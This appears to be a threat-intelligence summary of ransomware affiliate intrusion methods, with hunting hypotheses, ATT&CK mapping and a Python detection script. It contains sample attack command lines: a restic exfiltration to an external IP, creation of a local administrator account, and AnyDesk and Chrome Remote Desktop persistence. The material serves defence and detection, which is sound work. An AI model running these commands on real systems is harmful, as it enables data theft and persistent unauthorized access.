
Beyond the RaaS Headlines: The Reality of Ransomware Tradecraft

The Ransomware-as-a-Service (RaaS) ecosystem relies heavily on affiliates who dictate the actual intrusion tradecraft, meaning a single ransomware brand can be associated with vastly different attack chains. Affiliates frequently abuse legitimate Remote Monitoring and Management (RMM) tools, exposed RDP, and vulnerable edge appliances for initial access, followed by the use of LOLBins and open-source utilities for persistence and data exfiltration.

Confidence: high | Analyzed: 2026-05-21 | Google

Authors: Harlan Carvey, Lindsey O'Donnell-Welch

Actors: Akira, Qilin, LockBit, Scattered Spider, Moonstone Sleet, Devman, DragonForce, Apos, RansomHub

Source: Huntress

Detection / Hunter: Google

What Happened

Ransomware attacks are often carried out by 'affiliates' who rent the ransomware from its developers, rather than by the developers themselves. This means that the way an attacker breaks into a network can vary wildly even when the final ransomware payload is the same. Attackers frequently use legitimate remote access tools, weak passwords, or vulnerable network devices to get inside. Because the methods change so much, it is crucial for organizations to focus on strong security fundamentals such as monitoring their networks and reducing exposed systems. Defenders should investigate how the attackers got in, rather than focusing only on the name of the ransomware.

Key Takeaways

  • Ransomware brands do not dictate the intrusion chain; affiliates determine the tradecraft, meaning a single ransomware family can be associated with vastly different attack paths.
  • Initial access frequently involves abused legitimate tools like RMMs (Bomgar, ScreenConnect, TeamViewer), exposed RDP, or vulnerable edge appliances.
  • Persistence is often achieved via rogue RMM installations (AnyDesk, Chrome Remote Desktop) and hidden local user accounts.
  • Data staging and exfiltration leverage tools like 7-Zip, RClone, S5cmd, Restic, and LOLBins like finger.exe.
  • Defenders must investigate the full intrusion path rather than making assumptions based on the ransomware payload's branding.

Affected Systems

  • Windows
  • SonicWall VPNs
  • Remote Desktop Protocol (RDP)
  • Microsoft SQL Server (MSSQL)

Attack Chain

Threat actors gain initial access via exposed RDP, vulnerable edge appliances (like SonicWall VPNs), or compromised RMM tools (such as Bomgar). Once inside, they establish persistence by creating hidden local user accounts and installing additional remote access tools like AnyDesk or Chrome Remote Desktop. The attackers then evade defenses using EDR/AV killers or BYOVD techniques before staging data with archiving tools like 7-Zip. Finally, data is exfiltrated using LOLBins, backup utilities like Restic, or cloud sync tools before the ransomware payload is deployed.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide specific detection rules, but outlines behavioral patterns and command-line fragments observed in Huntress telemetry.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions are highly effective at capturing process creation events, command-line arguments (like those used for 7-Zip, Restic, and net.exe), and the installation of new services for RMM tools.

Network Visibility: Medium — While network monitoring can detect large outbound data transfers to cloud storage or unusual RDP/VPN traffic, the use of encrypted channels and legitimate services (like MEGASync or AnyDesk) can blend in with normal traffic.

Detection Difficulty: Moderate — Detecting these intrusions requires distinguishing between legitimate administrative use of RMMs/backup tools and malicious abuse, which relies heavily on behavioral context and anomaly detection.

Required Log Sources

  • Process Creation (Event ID 4688)
  • Sysmon Event ID 1 (Process creation)
  • Service Creation (Event ID 7045)
  • Local Group Membership (Event ID 4732)

Hunting Hypotheses

  • Hypothesis: Consider hunting for unexpected execution of portable archiving tools (like 7zG.exe) from user profile directories such as Downloads or Temp. | Telemetry: Process Creation | ATT&CK Stage: Collection | FP Risk: Low to Medium
  • Hypothesis: Evaluate whether local administrator accounts are being created by unusual parent processes or outside of standard provisioning windows. | Telemetry: Security Event Logs (Event ID 4732) | ATT&CK Stage: Persistence | FP Risk: Low
  • Hypothesis: If you have visibility into service creation, consider hunting for the unexpected installation of RMM tools like AnyDesk or Chrome Remote Desktop on critical servers. | Telemetry: System Event Logs (Event ID 7045) | ATT&CK Stage: Persistence | FP Risk: Medium
  • Hypothesis: Consider hunting for the use of backup utilities like Restic or open-source tools like RClone executing with command-line arguments pointing to external or untrusted IP addresses. | Telemetry: Process Creation | ATT&CK Stage: Exfiltration | FP Risk: Medium

Control Gaps

  • Lack of strict application control allowing portable executables to run from user directories
  • Insufficient monitoring of legitimate RMM tool usage
  • Inadequate network segmentation allowing lateral movement via RDP

Key Behavioral Indicators

  • Execution of bomgar-scc.exe spawning cmd.exe and net.exe
  • AnyDesk.exe running with --control or --service flags
  • remoting_host.exe running with --type=daemon
  • restic.exe executing with --password-file and external HTTP destinations
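The hunting hypotheses and behavioral indicators above can be turned into simple process-creation rules. The following is an added example, not code from Huntress or the original article: it evaluates Sysmon Event ID 1 style records (Image, CommandLine, ParentImage) against each hypothesis, treats only RFC1918 and loopback ranges as internal (an assumption), and runs over constructed sample events whose install paths mirror the ones listed on this page.

```python
import re
from ipaddress import ip_address, ip_network
from pathlib import PureWindowsPath
from urllib.parse import urlparse
# Staging/exfil tools named on the page; the first rule fires only when they run from a user profile dir.
STAGING_TOOLS = {"7z.exe", "7zg.exe", "rclone.exe", "s5cmd.exe", "restic.exe"}
USER_DIRS = ("\\downloads\\", "\\temp\\")
# Assumption: only RFC1918 and loopback count as internal; extend with your own ranges.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def _external_host(url):
    """True when the repo URL points outside INTERNAL_NETS (bare hostnames count as external)."""
    host = urlparse(url).hostname
    try:
        addr = ip_address(host)
    except ValueError:
        return host is not None
    return not any(addr in net for net in INTERNAL_NETS)

def hunt(event):
    """Return the page-derived hunting rules matched by one Sysmon Event ID 1 style record."""
    image, cmd = event["Image"], event["CommandLine"]
    name, low = PureWindowsPath(image).name.lower(), cmd.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    hits = []
    if name in STAGING_TOOLS and any(d in image.lower() for d in USER_DIRS):
        hits.append("staging_tool_from_user_dir")
    if name == "anydesk.exe" and ("--control" in low or "--service" in low):
        hits.append("anydesk_control_or_service")
    if name == "remoting_host.exe" and "--type=daemon" in low:
        hits.append("chrome_remote_desktop_daemon")
    repo = re.search(r"-r\s+(?:rest:)?(https?://\S+)", cmd)  # restic -r rest:http://... repository
    if name == "restic.exe" and repo and _external_host(repo.group(1)):
        hits.append("restic_to_external_http")
    if parent == "bomgar-scc.exe" and name in {"cmd.exe", "net.exe"}:
        hits.append("bomgar_spawning_shell")
    if name in {"net.exe", "net1.exe"} and "localgroup administrators" in low and "/add" in low:
        hits.append("local_admin_added")
    return hits

# Constructed sample events (not real telemetry); install paths mirror the ones listed on the page.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\jdoe\Downloads\7zG.exe", "CommandLine": r'"C:\Users\jdoe\Downloads\7zG.exe" a stage.7z D:\Finance', "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Program Files\7-Zip\7zG.exe", "CommandLine": r'"C:\Program Files\7-Zip\7zG.exe" a notes.7z C:\Notes', "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe", "CommandLine": "AnyDesk.exe --service", "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Program Files (x86)\Google\Chrome Remote Desktop\147.0.7727.3\remoting_host.exe", "CommandLine": r'"remoting_host.exe" --type=daemon --host-config=<placeholder>', "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Users\jdoe\AppData\Local\Temp\restic.exe", "CommandLine": r"restic.exe -r rest:http://203.0.113.10:8000/repo --password-file p.txt backup D:\Finance", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\net.exe", "CommandLine": "net localgroup administrators svc_backup /add", "ParentImage": r"C:\ProgramData\bomgar-scc-placeholder\bomgar-scc.exe"},
]
```

The second sample (7zG.exe from its normal install path) deliberately matches nothing, which is the behavioral context the False Positive Assessment calls for.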

False Positive Assessment

  • Medium. The threat actors heavily rely on Living-off-the-Land binaries (LOLBins) and legitimate administrative tools (RMMs, backup utilities, 7-Zip). Alerting purely on the presence of these tools without behavioral context will generate false positives in environments where they are used legitimately.

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Consider auditing all installed Remote Monitoring and Management (RMM) tools and removing unauthorized instances like AnyDesk or Chrome Remote Desktop.
  • Evaluate whether exposed RDP services can be disabled or placed behind a VPN with MFA enforced.

Infrastructure Hardening

  • Consider implementing strict application control policies to prevent the execution of portable utilities (e.g., 7-Zip Portable, RClone) from user directories.
  • Evaluate network segmentation strategies to limit lateral movement via SMB and RDP.
  • If applicable, ensure all edge appliances (like SonicWall VPNs) are patched to the latest firmware versions to prevent exploitation.

User Protection

  • Consider enforcing multi-factor authentication (MFA) for all remote access and VPN solutions.
  • Evaluate whether local administrator privileges can be restricted for standard users to prevent unauthorized account creation.

Security Awareness

  • Consider training help-desk staff on social engineering and vishing tactics frequently used by affiliates like Scattered Spider.
  • Evaluate incorporating RMM abuse scenarios into tabletop exercises and security awareness programs.

MITRE ATT&CK Mapping

  • T1133 - External Remote Services
  • T1190 - Exploit Public-Facing Application
  • T1078 - Valid Accounts
  • T1136.001 - Create Account: Local Account
  • T1219 - Remote Access Software
  • T1562.001 - Impair Defenses: Disable or Modify Tools
  • T1560.001 - Archive Collected Data: Archive via Utility
  • T1048 - Exfiltration Over Alternative Protocol
  • T1486 - Data Encrypted for Impact

Additional IOCs

  • File Paths:
    • C:\Program Files (x86)\AnyDesk\AnyDesk.exe - Legitimate AnyDesk executable path abused for persistence
    • C:\Program Files (x86)\Google\Chrome Remote Desktop\147.0.7727.3\remoting_host.exe - Legitimate Chrome Remote Desktop executable path abused for persistence
  • Command Lines:
    • Purpose: Local administrator account creation for persistence | Tools: net.exe, cmd.exe | Stage: Persistence | net localgroup administrators
    • Purpose: AnyDesk execution for remote access and persistence | Tools: AnyDesk.exe | Stage: Persistence | AnyDesk.exe --control
    • Purpose: AnyDesk service installation for persistence | Tools: AnyDesk.exe | Stage: Persistence | AnyDesk.exe --service
    • Purpose: Chrome Remote Desktop execution as a daemon for persistence | Tools: remoting_host.exe | Stage: Persistence | remoting_host.exe" --type=daemon --host-config=
    • Purpose: Data staging and compression using portable 7-Zip | Tools: 7zG.exe | Stage: Collection | 7zG.exe" a -i#
    • Purpose: Data exfiltration using Restic backup utility | Tools: restic.exe | Stage: Exfiltration | restic.exe -r rest:http://